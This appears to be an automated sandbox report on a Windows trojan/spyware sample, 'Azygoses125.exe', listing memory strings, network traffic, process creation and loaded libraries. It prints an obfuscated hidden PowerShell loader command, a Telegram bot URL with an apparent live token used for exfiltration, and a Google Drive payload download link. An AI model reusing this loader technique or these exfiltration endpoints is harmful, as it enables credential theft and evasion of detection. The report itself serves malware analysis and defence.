Source: msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/(
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2532365500.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb
Source: msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download;
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1518306553.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.00000000209E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000009.00000002.2545503931.00000000209E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B53000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49866 version: TLS 1.2

Source: C:\Users\user\Desktop\Azygoses125.exe

Code function: 3_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

3_2_00405421

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Azygoses125.exe

Code function: 3_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

3_2_004033B6

Source: C:\Users\user\Desktop\Azygoses125.exe

File created: C:\Windows\resources\unthick.ini

Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_00406847	3_2_00406847
Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_00404C5E	3_2_00404C5E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3C19B	9_2_00A3C19B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3D2CD	9_2_00A3D2CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A35362	9_2_00A35362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3D599	9_2_00A3D599
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3C788	9_2_00A3C788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3CA58	9_2_00A3CA58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3EC18	9_2_00A3EC18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3CD28	9_2_00A3CD28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A33E09	9_2_00A33E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3CFF7	9_2_00A3CFF7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3A088	9_2_00A3A088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3F804	9_2_00A3F804
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A329E0	9_2_00A329E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3EC0C	9_2_00A3EC0C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A3FC55	9_2_00A3FC55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_2_00A36FC8	9_2_00A36FC8

Source: Azygoses125.exe

Static PE information: invalid certificate

Source: Azygoses125.exe, 00000003.00000000.1280828634.000000000044F000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameharbinger.exeJ vs Azygoses125.exe
Source: Azygoses125.exe	Binary or memory string: OriginalFilenameharbinger.exeJ vs Azygoses125.exe
Source: Azygoses125.exe.5.dr	Binary or memory string: OriginalFilenameharbinger.exeJ vs Azygoses125.exe

Source: Azygoses125.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@6/5

Source: C:\Users\user\Desktop\Azygoses125.exe

3_2_004033B6

Source: C:\Users\user\Desktop\Azygoses125.exe

Code function: 3_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

3_2_004046E2

Source: C:\Users\user\Desktop\Azygoses125.exe

Code function: 3_2_00402095 CoCreateInstance,

3_2_00402095

Source: C:\Users\user\Desktop\Azygoses125.exe

File created: C:\Users\user\AppData\Local\magmaet

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03

Source: C:\Users\user\Desktop\Azygoses125.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsd8E31.tmp

Jump to behavior

Source: Azygoses125.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Azygoses125.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 00000009.00000002.2545503931.0000000020C23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020BE3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020BF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020C17000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020BD4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Azygoses125.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Azygoses125.exe

File read: C:\Users\user\Desktop\Azygoses125.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Azygoses125.exe "C:\Users\user\Desktop\Azygoses125.exe"
Source: C:\Users\user\Desktop\Azygoses125.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Azygoses125.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
